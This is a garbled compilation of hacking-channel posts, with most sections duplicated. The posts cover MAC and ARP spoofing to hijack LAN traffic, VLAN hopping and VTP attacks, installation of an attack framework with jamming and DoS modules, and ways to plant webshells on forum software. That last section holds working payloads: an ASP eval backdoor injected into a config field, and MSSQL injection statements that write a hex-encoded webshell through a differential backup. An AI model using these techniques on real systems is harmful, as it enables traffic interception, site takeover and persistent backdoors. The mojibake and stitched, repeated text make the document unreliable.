β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦B)Second, actual combat
( Elaborate on the MAC spoofing process )
The working environment is the above 4 port swith. The software uses cncert's httphijack as an example. The application is to hijack the data of host C from host A.
The following is the hijacking process (da is the destination MAC, sa is the source MAC)
1) A sends any data packets with da = gateway.mac and sa = B.mac to the gateway.
This shows that b.mac corresponds to port.a. In a period of time, the switch will send all the data frames sent to b.mac to the host a. This time continues until host b sends a data packet, or another data packet with da = gateway.mac and sa = b.mac is generated.
2) The host A receives the data sent by the gateway to B, and then forwards it to B after recording or modification. Before forwarding, it sends a broadcast requesting B.MAC. This packet is normal
MAC information: da = FFFFFFFFFF, sa = a.mac.
This data frame indicates that a.mac corresponds to port.a, and at the same time it will stimulate the host b to respond to a response packet.
MAC information is: da = a.mac, sa = b.mac
This data frame indicates that b.mac corresponds to port.b
At this point, the correspondence has been restored, the host A can successfully forward the hijacked data to B
3) Forward the hijacked data to B to complete a hijacking
C) Attack characteristics
1) Due to the time segmentation characteristics of this attack method, the greater the traffic of the other party, the lower the frequency of hijacking and the more stable the network.
2) Strong concealment, based on the particularity and working essence of 1, it can work in the environment of ARP firewall and two-way binding.
Fourth, how to protect
Advanced switches can use ip + mac + port binding to control automatic learning of CAM tables. There is currently no software to protect against such attacks
π¦Five, use tools
1)httphijack beta 2 Description: http session hijacking
2)ssclone Description: Session replication software in exchange environment (gmail, qqmail, sohumail ...)
3)skiller Description: under flow control
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦B)Second, actual combat
( Elaborate on the MAC spoofing process )
The working environment is the above 4 port swith. The software uses cncert's httphijack as an example. The application is to hijack the data of host C from host A.
The following is the hijacking process (da is the destination MAC, sa is the source MAC)
1) A sends any data packets with da = gateway.mac and sa = B.mac to the gateway.
This shows that b.mac corresponds to port.a. In a period of time, the switch will send all the data frames sent to b.mac to the host a. This time continues until host b sends a data packet, or another data packet with da = gateway.mac and sa = b.mac is generated.
2) The host A receives the data sent by the gateway to B, and then forwards it to B after recording or modification. Before forwarding, it sends a broadcast requesting B.MAC. This packet is normal
MAC information: da = FFFFFFFFFF, sa = a.mac.
This data frame indicates that a.mac corresponds to port.a, and at the same time it will stimulate the host b to respond to a response packet.
MAC information is: da = a.mac, sa = b.mac
This data frame indicates that b.mac corresponds to port.b
At this point, the correspondence has been restored, the host A can successfully forward the hijacked data to B
3) Forward the hijacked data to B to complete a hijacking
C) Attack characteristics
1) Due to the time segmentation characteristics of this attack method, the greater the traffic of the other party, the lower the frequency of hijacking and the more stable the network.
2) Strong concealment, based on the particularity and working essence of 1, it can work in the environment of ARP firewall and two-way binding.
Fourth, how to protect
Advanced switches can use ip + mac + port binding to control automatic learning of CAM tables. There is currently no software to protect against such attacks
π¦Five, use tools
1)httphijack beta 2 Description: http session hijacking
2)ssclone Description: Session replication software in exchange environment (gmail, qqmail, sohumail ...)
3)skiller Description: under flow control
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ The common VLAN attacks are as follows:
instagram.com/UndercodeTesting
π¦ππΌπ'π πππΈβπ :
1) VLAN attack 1.802.1Q and ISL tag attack
A tag attack is a malicious attack. With it, users on one VLAN can illegally access another VLAN. For example, if the switch port is configured as DTP (DYNAMIC TRUNK PROTCOL) auto to receive fake DTP (DYNAMIC TRUNK PROTCOL) packets, it will become a trunk port and may receive traffic to any VLAN. Thus, malicious users can communicate with other VLANs through the controlled ports. Sometimes even if only receiving ordinary packets, the switch port may violate its original intention and operate like an all-round trunk port (for example, receiving packets from other VLANs than the local one). This phenomenon is often referred to as "VLAN leakage."
> For this kind of attack, simply set the DTP (DYNAMIC TRUNK PROTCOL) on all untrusted ports (not meeting the trust condition) to "Off" to prevent this kind of attack. The software and hardware running on the Cisco Catalyst 2950, ββCatalyst 3550, Catalyst 4000, and Catalyst 6000 series switches can also implement proper traffic classification and isolation on all ports.
2) VLAN attack 2. Double encapsulation 802.1Q / nested VLAN attack
Inside the switch, VLAN numbers and identifications are expressed in a special extended format, the purpose is to keep the forwarding path independent of the end-to-end VLAN without losing any information. Outside the switch, the marking rules are specified by standards such as ISL or 802.1Q.
> ISL belongs to Cisco's proprietary technology and is a compact form of the extended packet header used in the device. Each packet always gets a mark, and there is no risk of logo loss, which can improve security.
> On the other hand, the IEEE committee that developed 802.1Q decided that for backward compatibility, it is best to support intrinsic VLANs, that is, VLANs that are not explicitly related to any tags on the 802.1Q link. This VLAN is used implicitly to receive all untagged traffic on the 802.1Q port.
π¦ This feature is what users want, because with this feature, the 802.1Q port can directly talk to the old 802.3 port by sending and receiving unmarked traffic. However, in all other cases, this feature can be very harmful, because when transmitted over an 802.1Q link, packets associated with the native VLAN will lose their tags, such as their class of service (802.1p bits).
3) Stripped first, then sent back to the attacker 802.1q frame, VLAN A, VLAN B data contains the trunk VLAN B data of the native VLAN A
Note: Only if the trunk's native VLAN is the same as the attacker's, will it take effect.
4) When double-encapsulated 802.1Q packets happen to enter the network from devices with the same VLAN as the eigen VLAN of the trunk, the VLAN IDs of these packets will not be retained end-to-end, because the 802.1Q trunk will always modify the packet, that is, strip its external mark. After removing the external tag, the internal tag will become the unique VLAN identifier of the packet. Therefore, if the packet is double-encapsulated with two different tags, the traffic can jump between different VLANs.
5) This situation will be regarded as a misconfiguration, because the 802.1Q standard does not force users to use the native VLAN in these situations. In fact, the proper configuration that should always be used is to clear the native VLAN from all 802.1Q trunks (setting it to 802.1q-all-tagged mode can achieve the exact same effect). When the local VLAN cannot be cleared, the unused VLAN should be selected as the local VLAN of all trunk roads, and the VLAN cannot be used for any other purpose. Protocols such as STP, DTP (DYNAMIC TRUNK PROTCOL) and UDLD should be the only legal users of the local VLAN, and their traffic should be completely isolated from all data packets.
6) VLAN attack 3. VLAN hopping attack
π¦ The common VLAN attacks are as follows:
instagram.com/UndercodeTesting
π¦ππΌπ'π πππΈβπ :
1) VLAN attack 1.802.1Q and ISL tag attack
A tag attack is a malicious attack. With it, users on one VLAN can illegally access another VLAN. For example, if the switch port is configured as DTP (DYNAMIC TRUNK PROTCOL) auto to receive fake DTP (DYNAMIC TRUNK PROTCOL) packets, it will become a trunk port and may receive traffic to any VLAN. Thus, malicious users can communicate with other VLANs through the controlled ports. Sometimes even if only receiving ordinary packets, the switch port may violate its original intention and operate like an all-round trunk port (for example, receiving packets from other VLANs than the local one). This phenomenon is often referred to as "VLAN leakage."
> For this kind of attack, simply set the DTP (DYNAMIC TRUNK PROTCOL) on all untrusted ports (not meeting the trust condition) to "Off" to prevent this kind of attack. The software and hardware running on the Cisco Catalyst 2950, ββCatalyst 3550, Catalyst 4000, and Catalyst 6000 series switches can also implement proper traffic classification and isolation on all ports.
2) VLAN attack 2. Double encapsulation 802.1Q / nested VLAN attack
Inside the switch, VLAN numbers and identifications are expressed in a special extended format, the purpose is to keep the forwarding path independent of the end-to-end VLAN without losing any information. Outside the switch, the marking rules are specified by standards such as ISL or 802.1Q.
> ISL belongs to Cisco's proprietary technology and is a compact form of the extended packet header used in the device. Each packet always gets a mark, and there is no risk of logo loss, which can improve security.
> On the other hand, the IEEE committee that developed 802.1Q decided that for backward compatibility, it is best to support intrinsic VLANs, that is, VLANs that are not explicitly related to any tags on the 802.1Q link. This VLAN is used implicitly to receive all untagged traffic on the 802.1Q port.
π¦ This feature is what users want, because with this feature, the 802.1Q port can directly talk to the old 802.3 port by sending and receiving unmarked traffic. However, in all other cases, this feature can be very harmful, because when transmitted over an 802.1Q link, packets associated with the native VLAN will lose their tags, such as their class of service (802.1p bits).
3) Stripped first, then sent back to the attacker 802.1q frame, VLAN A, VLAN B data contains the trunk VLAN B data of the native VLAN A
Note: Only if the trunk's native VLAN is the same as the attacker's, will it take effect.
4) When double-encapsulated 802.1Q packets happen to enter the network from devices with the same VLAN as the eigen VLAN of the trunk, the VLAN IDs of these packets will not be retained end-to-end, because the 802.1Q trunk will always modify the packet, that is, strip its external mark. After removing the external tag, the internal tag will become the unique VLAN identifier of the packet. Therefore, if the packet is double-encapsulated with two different tags, the traffic can jump between different VLANs.
5) This situation will be regarded as a misconfiguration, because the 802.1Q standard does not force users to use the native VLAN in these situations. In fact, the proper configuration that should always be used is to clear the native VLAN from all 802.1Q trunks (setting it to 802.1q-all-tagged mode can achieve the exact same effect). When the local VLAN cannot be cleared, the unused VLAN should be selected as the local VLAN of all trunk roads, and the VLAN cannot be used for any other purpose. Protocols such as STP, DTP (DYNAMIC TRUNK PROTCOL) and UDLD should be the only legal users of the local VLAN, and their traffic should be completely isolated from all data packets.
6) VLAN attack 3. VLAN hopping attack
Virtual local area network (VLAN) is a method of segmenting the broadcast domain. VLANs are also often used to provide additional security for the network because computers on one VLAN cannot talk to users on another VLAN without explicit access. However, VLAN itself is not enough to protect the security of the environment. Malicious hackers can jump from one VLAN to another even if they are not authorized.
7) VLAN hopping (VLAN hopping) relies on the dynamic relay protocol (DTP (DYNAMIC TRUNK PROTCOL)). If there are two interconnected switches, DTP (DYNAMIC TRUNK PROTCOL) can negotiate the two to determine whether they will become 802.1Q trunks. The negotiation process is done by checking the configuration status of the port.
> The VLAN hopping attack makes full use of DTP (DYNAMIC TRUNK PROTCOL). In the VLAN hopping attack, a hacker can deceive the computer and impersonate another switch to send a false DTP (DYNAMIC TRUNK PROTCOL) negotiation message, announcing that it wants to become a relay; the real After receiving this DTP (DYNAMIC TRUNK PROTCOL) message, the switch thought that it should enable the 802.1Q relay function, and once the relay function was enabled, the information flow through all VLANs would be sent to the hacker's computer.
> After the relay is established, the hacker can continue to detect the information flow, or it can specify the VLAN to which the attack traffic is sent by adding 802.1Q information to the frame.
8) VLAN attack 4. VTP attack
VLAN Trunk Protocol (VTP, VLAN Trunk Protocol) is a management protocol that can reduce the number of configurations in the switching environment. As far as VTP is concerned, the switch can be a VTP server, a VTP client, or a VTP transparent switch. Here we focus on the VTP server and the VTP client. Every time the user changes the configuration of the switch working in the VTP server mode, the VTP configuration version number will increase by 1 whether the VLAN is added, modified or removed. After the VTP client sees that the configuration version number is greater than the current version number, It will automatically synchronize with the VTP server.
> A malicious hacker can use VTP for his own purposes and remove all VLANs on the network (except the default VLAN), so that he can enter the same VLAN where every other user is. However, the user may still be on a different network segment, so a malicious hacker needs to change his IP address to enter the same network segment as the host he wants to attack.
> A malicious hacker can make full use of VTP by connecting to the switch and establishing a relay between his computer and the switch. A hacker can send a VTP message to the VTP server whose configuration version number is higher than the current one. This will cause all switches to synchronize with the malicious hacker's computer, thereby removing all non-default VLANs from the VLAN database.
9) So With so many kinds of attacks, we can see how fragile the VLAN we are implementing is, but we are thankful that if the configuration of the switch is incorrect or inappropriate, it may cause unexpected behavior or security problems. So we will tell you the key points you must pay attention to when configuring the switch
written by Undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
7) VLAN hopping (VLAN hopping) relies on the dynamic relay protocol (DTP (DYNAMIC TRUNK PROTCOL)). If there are two interconnected switches, DTP (DYNAMIC TRUNK PROTCOL) can negotiate the two to determine whether they will become 802.1Q trunks. The negotiation process is done by checking the configuration status of the port.
> The VLAN hopping attack makes full use of DTP (DYNAMIC TRUNK PROTCOL). In the VLAN hopping attack, a hacker can deceive the computer and impersonate another switch to send a false DTP (DYNAMIC TRUNK PROTCOL) negotiation message, announcing that it wants to become a relay; the real After receiving this DTP (DYNAMIC TRUNK PROTCOL) message, the switch thought that it should enable the 802.1Q relay function, and once the relay function was enabled, the information flow through all VLANs would be sent to the hacker's computer.
> After the relay is established, the hacker can continue to detect the information flow, or it can specify the VLAN to which the attack traffic is sent by adding 802.1Q information to the frame.
8) VLAN attack 4. VTP attack
VLAN Trunk Protocol (VTP, VLAN Trunk Protocol) is a management protocol that can reduce the number of configurations in the switching environment. As far as VTP is concerned, the switch can be a VTP server, a VTP client, or a VTP transparent switch. Here we focus on the VTP server and the VTP client. Every time the user changes the configuration of the switch working in the VTP server mode, the VTP configuration version number will increase by 1 whether the VLAN is added, modified or removed. After the VTP client sees that the configuration version number is greater than the current version number, It will automatically synchronize with the VTP server.
> A malicious hacker can use VTP for his own purposes and remove all VLANs on the network (except the default VLAN), so that he can enter the same VLAN where every other user is. However, the user may still be on a different network segment, so a malicious hacker needs to change his IP address to enter the same network segment as the host he wants to attack.
> A malicious hacker can make full use of VTP by connecting to the switch and establishing a relay between his computer and the switch. A hacker can send a VTP message to the VTP server whose configuration version number is higher than the current one. This will cause all switches to synchronize with the malicious hacker's computer, thereby removing all non-default VLANs from the VLAN database.
9) So With so many kinds of attacks, we can see how fragile the VLAN we are implementing is, but we are thankful that if the configuration of the switch is incorrect or inappropriate, it may cause unexpected behavior or security problems. So we will tell you the key points you must pay attention to when configuring the switch
written by Undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ARP attack methods and technical summary
1) arp Ddos attack
2)Arp return packet spoofing
3) Arp request spoofing
4) Arp whole network request spoofing
5) Arp man-in-the-middle
6) ArpIP address conflict
7) Arp gateway spoofing
8) Arp switch port forwarding spoofing (the most powerful is the attack method of the illusion network shield skiller.
written by Undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ARP attack methods and technical summary
1) arp Ddos attack
2)Arp return packet spoofing
3) Arp request spoofing
4) Arp whole network request spoofing
5) Arp man-in-the-middle
6) ArpIP address conflict
7) Arp gateway spoofing
8) Arp switch port forwarding spoofing (the most powerful is the attack method of the illusion network shield skiller.
written by Undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ here dedicate it to everyone. There are still some applications of arp that are discovered by everyone, so will not talk about it in front of everyone.
pinterest.com/undercode_Testing
π¦ππΌπ'π πππΈβπ :
1) The arp --ddos attack is actually sending a large number of normal AR
P request packets continuously, which consumes the host bandwidth. This kind of attack is not too significant in the local area network. The data packet is a normal packet and will not be filtered by the arp firewall and switch.
2) This solution, I do not limit the traffic in some switches, I will not do it, I don't know the feasibility, I personally think it is difficult to protect A ++++
> arp return packet spoofing
3)This kind of spoofing is the most common kind of spoofing. It is to send arp return data packets to the host.This packet uses the IP as the gateway address, and the physical address of the sending end is its own or forged, so that the other party's computer's IP-MAC address There is an error in the table.When the IP message adds this hardware address to the data and sends, it will appear that the correct physical exit address cannot be found.
4) This kind of protection is relatively simple. ARP -S is used to bind the gateway, and there is also arp firewall, but this spoofing may be overwritten by the correct address sent by the router.
> arp request spoofing
> ARP request spoofing is also relatively common. It is arp's request protocol. There is no error in the destination IP and MAC address. The error is that the requester's MAC address is problematic and is not true. This kind of spoofing and return spoofing are only OP values. different.
π¦ The protection method is the same as above :
1) arp whole network request spoofing
This kind of spoofing is a further extension of request spoofing and return spoofing.The principle is to change the target address of the Ethernet frame header to FF-FF-FF-FF-FF-FF is to broadcast to all hosts, source address IP address or gateway IP The address and physical address are fake MAC addresses, remember that in the destination IP, it is the 192.168.1.255 multicast address.
> This protection method is the same as above, and the entire network blocking function of software such as network law enforcement is implemented in this way.
2) arp man-in-the-middle
This kind of spoofing is carried out under the switch.Some people say that the data flow under the switching environment is safe.The following attack method is directed at the switch.
> The general process is like this, ABC three computers, A and C communicate normally, B initiates an intermediate attack, B first sends arp spoofing to tell A that I B is C, and then tells C that I B is A. So between A and C B's data transmission process was completely viewed by B, and it was a bit sloppy.This kind of deception also needs a data forwarding mechanism, otherwise the communication between A and C will be broken, such as the P2P terminator is this kind of deception
3) arpIP address conflict
The P address conflict is also caused by the ARP data packet.He just broadcasts the Ethernet frame header address.The source IP address and the destination IP address in the packet are the same.This kind of packet is very common, and everyone may not know it every time. When your PC is turned on, he will broadcast his IP address to see if any computer uses the same IP address. This broadcast is defined as "free arp"
> This kind of broadcast can be filtered directly with the arp firewall. In fact, this kind of packet will not cause a network disconnection, but it will always pop up an annoying dialog box. For example, there is a kind of packet sending such a longhorn network monitoring.
4) arp gateway spoofing
π¦ here dedicate it to everyone. There are still some applications of arp that are discovered by everyone, so will not talk about it in front of everyone.
pinterest.com/undercode_Testing
π¦ππΌπ'π πππΈβπ :
1) The arp --ddos attack is actually sending a large number of normal AR
P request packets continuously, which consumes the host bandwidth. This kind of attack is not too significant in the local area network. The data packet is a normal packet and will not be filtered by the arp firewall and switch.
2) This solution, I do not limit the traffic in some switches, I will not do it, I don't know the feasibility, I personally think it is difficult to protect A ++++
> arp return packet spoofing
3)This kind of spoofing is the most common kind of spoofing. It is to send arp return data packets to the host.This packet uses the IP as the gateway address, and the physical address of the sending end is its own or forged, so that the other party's computer's IP-MAC address There is an error in the table.When the IP message adds this hardware address to the data and sends, it will appear that the correct physical exit address cannot be found.
4) This kind of protection is relatively simple. ARP -S is used to bind the gateway, and there is also arp firewall, but this spoofing may be overwritten by the correct address sent by the router.
> arp request spoofing
> ARP request spoofing is also relatively common. It is arp's request protocol. There is no error in the destination IP and MAC address. The error is that the requester's MAC address is problematic and is not true. This kind of spoofing and return spoofing are only OP values. different.
π¦ The protection method is the same as above :
1) arp whole network request spoofing
This kind of spoofing is a further extension of request spoofing and return spoofing.The principle is to change the target address of the Ethernet frame header to FF-FF-FF-FF-FF-FF is to broadcast to all hosts, source address IP address or gateway IP The address and physical address are fake MAC addresses, remember that in the destination IP, it is the 192.168.1.255 multicast address.
> This protection method is the same as above, and the entire network blocking function of software such as network law enforcement is implemented in this way.
2) arp man-in-the-middle
This kind of spoofing is carried out under the switch.Some people say that the data flow under the switching environment is safe.The following attack method is directed at the switch.
> The general process is like this, ABC three computers, A and C communicate normally, B initiates an intermediate attack, B first sends arp spoofing to tell A that I B is C, and then tells C that I B is A. So between A and C B's data transmission process was completely viewed by B, and it was a bit sloppy.This kind of deception also needs a data forwarding mechanism, otherwise the communication between A and C will be broken, such as the P2P terminator is this kind of deception
3) arpIP address conflict
The P address conflict is also caused by the ARP data packet.He just broadcasts the Ethernet frame header address.The source IP address and the destination IP address in the packet are the same.This kind of packet is very common, and everyone may not know it every time. When your PC is turned on, he will broadcast his IP address to see if any computer uses the same IP address. This broadcast is defined as "free arp"
> This kind of broadcast can be filtered directly with the arp firewall. In fact, this kind of packet will not cause a network disconnection, but it will always pop up an annoying dialog box. For example, there is a kind of packet sending such a longhorn network monitoring.
4) arp gateway spoofing
Pinterest
UnderCode TESTING (UNDERCODE_TESTING) - Profile | Pinterest
UnderCode TESTING | πππππ£βπ ππ πππ€π₯πππ βπ ππ‘πππͺ:
Programming, Web & Applications makers, Host, bugs fix, Satellite Reicivers Programming..
Started Since 2011
Programming, Web & Applications makers, Host, bugs fix, Satellite Reicivers Programming..
Started Since 2011
This kind of spoofing is an extension from another method of spoofing. If the client is statically bound to the gateway and you install an arp firewall, you cannot spoof it or disconnect it from the Internet, then we will spoof the gateway. For example, A is the client and B is the server. A has done protection and you want to block him from accessing the Internet, so we deceive B by thinking that B is a computer and send him the false address of A all the time. Be bigger
5) arp switch spoofing {skiller}
This attack method has only been available in the past two years, and it is relatively simple to tell you now. I have never seen this attack method before. The principle may be more difficult to understand, and it is very troublesome to protect. If you attack me, now I can't help it at least.
π¦ The principle is to change the forwarding list of the switch.
1) arp switch spoofing attack ideas
The switch forwards according to the source and destination address frame headers of the Ethernet arp protocol.For example, A is at port 1 of the switch, and the gateway is at port 3.The switch goes out of port 3 according to the destination address sent by A. Why is it In this way, because the switch maintains a dynamic address list inside, there is a comparison table of MAC addresses and physical ports.If this table is static, it is not known whether this attack will take effect.
> First of all, the method I implemented is this, three PCs a, b, c. The attacker is C. If I want to block the host B, send an arp address request packet from B to A on the C computer, this packet is continuous Continuously, then B is blocked, why is that, B's request data can be sent out, the data packet he returns will be transferred to the C computer by the switch, the three-way handshake link is not established successfully, and the network will be Block, we can do a lot of things according to this idea, here is not an example, I am so hungry I don't write about eating.
π¦ Continue when you are full ...
Seeing here, my friends are a little dazed. In fact, it is very simple. Using Fengyun firewall is a wise choice. The above normal methods of deception must first know your IP and MAC. After opening Fengyun's security mode, it will only respond to the gateway. The request is like it does not exist for other hosts on the LAN. If the other party wants to ping and you want ARP scanning, you are in vain. If you do nβt think you do nβt exist, you ca nβt talk about the attack. ..
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
5) arp switch spoofing {skiller}
This attack method has only been available in the past two years, and it is relatively simple to tell you now. I have never seen this attack method before. The principle may be more difficult to understand, and it is very troublesome to protect. If you attack me, now I can't help it at least.
π¦ The principle is to change the forwarding list of the switch.
1) arp switch spoofing attack ideas
The switch forwards according to the source and destination address frame headers of the Ethernet arp protocol.For example, A is at port 1 of the switch, and the gateway is at port 3.The switch goes out of port 3 according to the destination address sent by A. Why is it In this way, because the switch maintains a dynamic address list inside, there is a comparison table of MAC addresses and physical ports.If this table is static, it is not known whether this attack will take effect.
> First of all, the method I implemented is this, three PCs a, b, c. The attacker is C. If I want to block the host B, send an arp address request packet from B to A on the C computer, this packet is continuous Continuously, then B is blocked, why is that, B's request data can be sent out, the data packet he returns will be transferred to the C computer by the switch, the three-way handshake link is not established successfully, and the network will be Block, we can do a lot of things according to this idea, here is not an example, I am so hungry I don't write about eating.
π¦ Continue when you are full ...
Seeing here, my friends are a little dazed. In fact, it is very simple. Using Fengyun firewall is a wise choice. The above normal methods of deception must first know your IP and MAC. After opening Fengyun's security mode, it will only respond to the gateway. The request is like it does not exist for other hosts on the LAN. If the other party wants to ping and you want ARP scanning, you are in vain. If you do nβt think you do nβt exist, you ca nβt talk about the attack. ..
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦What is Hakku Framework?
Hakku is simple framework that has been made for penetration testing tools. Hakku framework offers simple structure, basic CLI, and useful features for penetration testing tools developing. Hakku is on early stages and may be unstable, so please download the released versions from github or sourceforge, don't just clone github repository except you don't want stability, you want to try out latest features, or you just want to develop Hakku. Hakku is under MIT license, in other words you can do what you ever want with the source code.
Fb.com/UndercodeTesting
π¦FEATURES :
apache_users
arp_dos
arp_monitor
arp_spoof
bluetooth_pod
cloudflare_resolver
dhcp_dos
dir_scanner
dns_spoof
email_bomber
hostname_resolver
mac_spoof
mitm
network_kill
pma_scanner
port_scanner
proxy_scout
whois
web_killer
web_scout
wifi_jammer
zip_cracker
rar_cracker
wordlist_gen
π¦ OS support
==========
Linux supported, and developed on/for linux
OS X support not planned
Windows support not planned
π¦πβπππΈπππππΈπππβ & βπβ :
1) git clone https://github.com/4shadoww/hakkuframework.git
2) cd hakkuframework
3) sudo ./install -i
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦What is Hakku Framework?
Hakku is simple framework that has been made for penetration testing tools. Hakku framework offers simple structure, basic CLI, and useful features for penetration testing tools developing. Hakku is on early stages and may be unstable, so please download the released versions from github or sourceforge, don't just clone github repository except you don't want stability, you want to try out latest features, or you just want to develop Hakku. Hakku is under MIT license, in other words you can do what you ever want with the source code.
Fb.com/UndercodeTesting
π¦FEATURES :
apache_users
arp_dos
arp_monitor
arp_spoof
bluetooth_pod
cloudflare_resolver
dhcp_dos
dir_scanner
dns_spoof
email_bomber
hostname_resolver
mac_spoof
mitm
network_kill
pma_scanner
port_scanner
proxy_scout
whois
web_killer
web_scout
wifi_jammer
zip_cracker
rar_cracker
wordlist_gen
π¦ OS support
==========
Linux supported, and developed on/for linux
OS X support not planned
Windows support not planned
π¦πβπππΈπππππΈπππβ & βπβ :
1) git clone https://github.com/4shadoww/hakkuframework.git
2) cd hakkuframework
3) sudo ./install -i
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Facebook
Log in or sign up to view
See posts, photos and more on Facebook.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦common methods of taking webshell in the background :
t.me/UndercodeTesting
1) Direct upload to get webshell
> This kind of program for php and jsp is relatively common. MolyX BOARD is one of them. Upload the .php type directly in the mood icon management. Although there is no prompt, it is actually successful. The uploaded file url should be http: // forums / images Under / smiles /, the jsp system vulnerability of Lianzhong game station and Netease can upload the jsp file directly.
> The file name is the original file name, and the .php file can be uploaded directly in the backend of bo-blog. There is a prompt for the path of the uploaded file. And the upfile.asp vulnerability that was very popular a year ago (Dynamic Web 5.0 and 6.0, many early whole-site systems), due to the inefficient filtering of uploaded files, users can directly upload webshell to any writable directory on the website, so as to get The site's administrator controls permissions.
2) Second, add and modify the upload type
> Now many script program upload modules are not only allowed to upload legal file types, but most systems are allowed to add upload types, bbsxp background can add asa | asP type, ewebeditor background can also add asa type, after modification, we can directly I uploaded the asa suffixed webshell, and there is a case where the .asp is filtered. You can add the .aspasp file type to upload and get the webshell.
> In the background of the php system, we can add the upload type of .php.g1f, which is a feature of php, as long as the last one is not a known file type, php will normally run php.g1f as .php, thus You can also get a shell successfully. LeadBbs3.14 get webshell in the background: add asp to the upload type. Note that there is a space after the asp, and then upload the ASP horse in the foreground, of course, add a space in the back!
3) Three, use the background management function to write to the webshell
> The uploading vulnerability is basically completed, so we can write the webshell by modifying the relevant files after entering the background. Typical comparisons are dvbbs6.0, and leadbbs2.88, etc., directly modify the configuration file in the background, write the file with the suffix asp. Another method for LeadBbs3.14 to get a webshell in the background is to add a new friendship link and write the ice horse minimum horse on the site name. Enter some characters before and after the minimum horse, http: \\ website \ inc \ IncHtm \ BoardLink.asp is the shell we want.
4) Fourth, use the background management to write webshell to the configuration file
Use the "" "": "" // "and other symbols to construct the configuration file of the minimum horse writing program, joekoe forum, XX student records, boiling outlook news system, COCOON Counter statistical program, etc., and many php programs , COCOON Counter statistical program example, add cnhacker at 263 dot net ": eval request (chr (35)) // in the management mailbox, in the preparation file is webmail =" cnhacker at 263 dot net \ ": eval request (chr (35)) // ",
5) Five, asp + mssql system
It is necessary to mention the mssql version of the moving network, but it can be directly submitted locally for backup. First upload a fake picture with asp code in the post, and then remember the upload path. Write a locally submitted form, the code is as follows:
6) Save as .htm to execute locally. Fill in the upload path of the fake image in the "location of the uploaded file", fill in the relative path of the WebShell you want to back up in the "location to be copied to", and submit to get our lovely WebShell, the recovery code is similar to this, Just modify the relevant places.
> I haven't encountered a relatively powerful asp program background that executes the mssql command in the background. The database restoration and backup of the dynamic network is a decoration. I can't execute the sql command to back up the webshell. I can only execute some simple query commands.
π¦common methods of taking webshell in the background :
t.me/UndercodeTesting
1) Direct upload to get webshell
> This kind of program for php and jsp is relatively common. MolyX BOARD is one of them. Upload the .php type directly in the mood icon management. Although there is no prompt, it is actually successful. The uploaded file url should be http: // forums / images Under / smiles /, the jsp system vulnerability of Lianzhong game station and Netease can upload the jsp file directly.
> The file name is the original file name, and the .php file can be uploaded directly in the backend of bo-blog. There is a prompt for the path of the uploaded file. And the upfile.asp vulnerability that was very popular a year ago (Dynamic Web 5.0 and 6.0, many early whole-site systems), due to the inefficient filtering of uploaded files, users can directly upload webshell to any writable directory on the website, so as to get The site's administrator controls permissions.
2) Second, add and modify the upload type
> Now many script program upload modules are not only allowed to upload legal file types, but most systems are allowed to add upload types, bbsxp background can add asa | asP type, ewebeditor background can also add asa type, after modification, we can directly I uploaded the asa suffixed webshell, and there is a case where the .asp is filtered. You can add the .aspasp file type to upload and get the webshell.
> In the background of the php system, we can add the upload type of .php.g1f, which is a feature of php, as long as the last one is not a known file type, php will normally run php.g1f as .php, thus You can also get a shell successfully. LeadBbs3.14 get webshell in the background: add asp to the upload type. Note that there is a space after the asp, and then upload the ASP horse in the foreground, of course, add a space in the back!
3) Three, use the background management function to write to the webshell
> The uploading vulnerability is basically completed, so we can write the webshell by modifying the relevant files after entering the background. Typical comparisons are dvbbs6.0, and leadbbs2.88, etc., directly modify the configuration file in the background, write the file with the suffix asp. Another method for LeadBbs3.14 to get a webshell in the background is to add a new friendship link and write the ice horse minimum horse on the site name. Enter some characters before and after the minimum horse, http: \\ website \ inc \ IncHtm \ BoardLink.asp is the shell we want.
4) Fourth, use the background management to write webshell to the configuration file
Use the "" "": "" // "and other symbols to construct the configuration file of the minimum horse writing program, joekoe forum, XX student records, boiling outlook news system, COCOON Counter statistical program, etc., and many php programs , COCOON Counter statistical program example, add cnhacker at 263 dot net ": eval request (chr (35)) // in the management mailbox, in the preparation file is webmail =" cnhacker at 263 dot net \ ": eval request (chr (35)) // ",
5) Five, asp + mssql system
It is necessary to mention the mssql version of the moving network, but it can be directly submitted locally for backup. First upload a fake picture with asp code in the post, and then remember the upload path. Write a locally submitted form, the code is as follows:
6) Save as .htm to execute locally. Fill in the upload path of the fake image in the "location of the uploaded file", fill in the relative path of the WebShell you want to back up in the "location to be copied to", and submit to get our lovely WebShell, the recovery code is similar to this, Just modify the relevant places.
> I haven't encountered a relatively powerful asp program background that executes the mssql command in the background. The database restoration and backup of the dynamic network is a decoration. I can't execute the sql command to back up the webshell. I can only execute some simple query commands.
7) You can use mssql to inject a differential backup webshell. Generally, the background shows the absolute path. As long as you have an injection point, you can basically make a differential backup. The following is the main statement code of differential backup. You can use the injection vulnerability of DynamicNet 7.0 to backup a webshell with differential. You can use the method mentioned above to backup the conn.asp file to a .txt file to obtain the library name.
π¦ The main code of differential backup:
8) declare at a sysname, @ s varchar (4000) select @ a = db_name (), @ s = 0x626273 backup database @a to disk = @
s--; Drop table [heige]; create table [dbo] dot [heige ] ([cmd] [image])-
; insert into heige (cmd) values ββ(0x3C2565786563757465207265717565737428226C2229253E)-
; declare at a sysname, @ s varchar (4000) select @ a = db_name (), @ s = 0x643A5C7765625C312E617370 backup database @a to disk = @ s WITH DIFFERENTIAL, FORMAT--
